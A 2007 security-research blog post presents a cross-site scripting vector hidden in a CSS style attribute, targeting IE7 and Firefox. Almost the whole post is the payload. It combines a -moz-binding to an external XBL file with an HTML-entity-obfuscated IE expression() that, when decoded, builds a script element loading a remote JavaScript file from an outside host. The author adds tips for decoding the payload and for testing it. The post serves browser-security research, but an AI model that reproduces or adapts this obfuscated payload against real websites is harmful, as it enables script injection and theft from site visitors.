The Spanner logo

    Ultimate XSS CSS injection

    Back to articles

    hackvertor

    Author:

    Gareth Heyes

    @hackvertor

    Published: Mon, 26 Nov 2007 14:48:56 GMT

    Updated: Sat, 22 Mar 2025 15:38:07 GMT

    Here's a final XSS CSS vector which works on IE7 and Firefox. The IE7 vector was based on the brilliant work of Martin which I modified slightly and found that IE will also accept htmlentities in css styles.

    Credits update

    The expression part of this technique was first demonstrated by Dan on the slackers forums, nice one Dan sorry about missing you from the credits.

    <pre lang="css"> &lt;div style=&quot;\-\mo\z\-b\i\nd\in\g:\url(//business\i\nfo.co.uk\/labs \/xbl\/xbl\.xml\#xss);&amp;#x78&amp;#x78&amp;#x3A&amp;#x20&amp;#x65&amp;#x5C &amp;#x78&amp;#x70&amp;#x5C&amp;#x72&amp;#x65&amp;#x5C&amp;#x73&amp;#x5C&amp;#x73&amp;#x5C &amp;#x69&amp;#x5C&amp;#x6F&amp;#x5C&amp;#x6E&amp;#x28&amp;#x28&amp;#x77&amp;#x69&amp;#x6E &amp;#x64&amp;#x6F&amp;#x77&amp;#x2E&amp;#x72&amp;#x21&amp;#x3D&amp;#x31&amp;#x29&amp;#x20 &amp;#x3F&amp;#x20&amp;#x65&amp;#x76&amp;#x61&amp;#x6C&amp;#x28&amp;#x27&amp;#x78&amp;#x3D &amp;#x53&amp;#x74&amp;#x72&amp;#x69&amp;#x6E&amp;#x67&amp;#x2E&amp;#x66&amp;#x72&amp;#x6F &amp;#x6D&amp;#x43&amp;#x68&amp;#x61&amp;#x72&amp;#x43&amp;#x6F&amp;#x64&amp;#x65&amp;#x3B &amp;#x73&amp;#x63&amp;#x72&amp;#x3D&amp;#x64&amp;#x6F&amp;#x63&amp;#x75&amp;#x6D&amp;#x65 &amp;#x6E&amp;#x74&amp;#x2E&amp;#x63&amp;#x72&amp;#x65&amp;#x61&amp;#x74&amp;#x65&amp;#x45 &amp;#x6C&amp;#x65&amp;#x6D&amp;#x65&amp;#x6E&amp;#x74&amp;#x28&amp;#x78&amp;#x28&amp;#x31 &amp;#x31&amp;#x35&amp;#x2C&amp;#x39&amp;#x39&amp;#x2C&amp;#x31&amp;#x31&amp;#x34&amp;#x2C &amp;#x31&amp;#x30&amp;#x35&amp;#x2C&amp;#x31&amp;#x31&amp;#x32&amp;#x2C&amp;#x31&amp;#x31 &amp;#x36&amp;#x29&amp;#x29&amp;#x3B&amp;#x73&amp;#x63&amp;#x72&amp;#x2E&amp;#x73&amp;#x65 &amp;#x74&amp;#x41&amp;#x74&amp;#x74&amp;#x72&amp;#x69&amp;#x62&amp;#x75&amp;#x74&amp;#x65 &amp;#x28&amp;#x78&amp;#x28&amp;#x31&amp;#x31&amp;#x35&amp;#x2C&amp;#x31&amp;#x31&amp;#x34 &amp;#x2C&amp;#x39&amp;#x39&amp;#x29&amp;#x2C&amp;#x78&amp;#x28&amp;#x31&amp;#x30&amp;#x34 &amp;#x2C&amp;#x31&amp;#x31&amp;#x36&amp;#x2C&amp;#x31&amp;#x31&amp;#x36&amp;#x2C&amp;#x31 &amp;#x31&amp;#x32&amp;#x2C&amp;#x35&amp;#x38&amp;#x2C&amp;#x34&amp;#x37&amp;#x2C&amp;#x34 &amp;#x37&amp;#x2C&amp;#x39&amp;#x38&amp;#x2C&amp;#x31&amp;#x31&amp;#x37&amp;#x2C&amp;#x31 &amp;#x31&amp;#x35&amp;#x2C&amp;#x31&amp;#x30&amp;#x35&amp;#x2C&amp;#x31&amp;#x31&amp;#x30 &amp;#x2C&amp;#x31&amp;#x30&amp;#x31&amp;#x2C&amp;#x31&amp;#x31&amp;#x35&amp;#x2C&amp;#x31 &amp;#x31&amp;#x35&amp;#x2C&amp;#x31&amp;#x30&amp;#x35&amp;#x2C&amp;#x31&amp;#x31&amp;#x30 &amp;#x2C&amp;#x31&amp;#x30&amp;#x32&amp;#x2C&amp;#x31&amp;#x31&amp;#x31&amp;#x2C&amp;#x34 &amp;#x36&amp;#x2C&amp;#x39&amp;#x39&amp;#x2C&amp;#x31&amp;#x31&amp;#x31&amp;#x2C&amp;#x34 &amp;#x36&amp;#x2C&amp;#x31&amp;#x31&amp;#x37&amp;#x2C&amp;#x31&amp;#x30&amp;#x37&amp;#x2C &amp;#x34&amp;#x37&amp;#x2C&amp;#x31&amp;#x30&amp;#x38&amp;#x2C&amp;#x39&amp;#x37&amp;#x2C &amp;#x39&amp;#x38&amp;#x2C&amp;#x31&amp;#x31&amp;#x35&amp;#x2C&amp;#x34&amp;#x37&amp;#x2C &amp;#x31&amp;#x32&amp;#x30&amp;#x2C&amp;#x31&amp;#x31&amp;#x35&amp;#x2C&amp;#x31&amp;#x31 &amp;#x35&amp;#x2C&amp;#x34&amp;#x37&amp;#x2C&amp;#x31&amp;#x32&amp;#x30&amp;#x2C&amp;#x31 &amp;#x31&amp;#x35&amp;#x2C&amp;#x31&amp;#x31&amp;#x35&amp;#x2C&amp;#x34&amp;#x36&amp;#x2C &amp;#x31&amp;#x30&amp;#x36&amp;#x2C&amp;#x31&amp;#x31&amp;#x35&amp;#x29&amp;#x29&amp;#x3B &amp;#x64&amp;#x6F&amp;#x63&amp;#x75&amp;#x6D&amp;#x65&amp;#x6E&amp;#x74&amp;#x2E&amp;#x67 &amp;#x65&amp;#x74&amp;#x45&amp;#x6C&amp;#x65&amp;#x6D&amp;#x65&amp;#x6E&amp;#x74&amp;#x42 &amp;#x79&amp;#x49&amp;#x64&amp;#x28&amp;#x78&amp;#x28&amp;#x20&amp;#x31&amp;#x30&amp;#x35 &amp;#x2C&amp;#x31&amp;#x31&amp;#x30&amp;#x2C&amp;#x31&amp;#x30&amp;#x36&amp;#x2C&amp;#x31 &amp;#x30&amp;#x31&amp;#x2C&amp;#x39&amp;#x39&amp;#x2C&amp;#x31&amp;#x31&amp;#x36&amp;#x20 &amp;#x29&amp;#x29&amp;#x2E&amp;#x61&amp;#x70&amp;#x70&amp;#x65&amp;#x6E&amp;#x64&amp;#x43 &amp;#x68&amp;#x69&amp;#x6C&amp;#x64&amp;#x28&amp;#x73&amp;#x63&amp;#x72&amp;#x29&amp;#x3B &amp;#x77&amp;#x69&amp;#x6E&amp;#x64&amp;#x6F&amp;#x77&amp;#x2E&amp;#x72&amp;#x3D&amp;#x31 &amp;#x3B&amp;#x27&amp;#x29 : 1);&quot; id=&quot;inject&quot;&gt;test&lt;/div&gt; </pre>

    Please use my tool Hackvertor if you need to decode the IE vector as it will provide you with all the necessary conversions. Please note the vector has been broke up onto multiple lines for viewing purposes, please remove the line breaks when testing the vector.

    Back to articles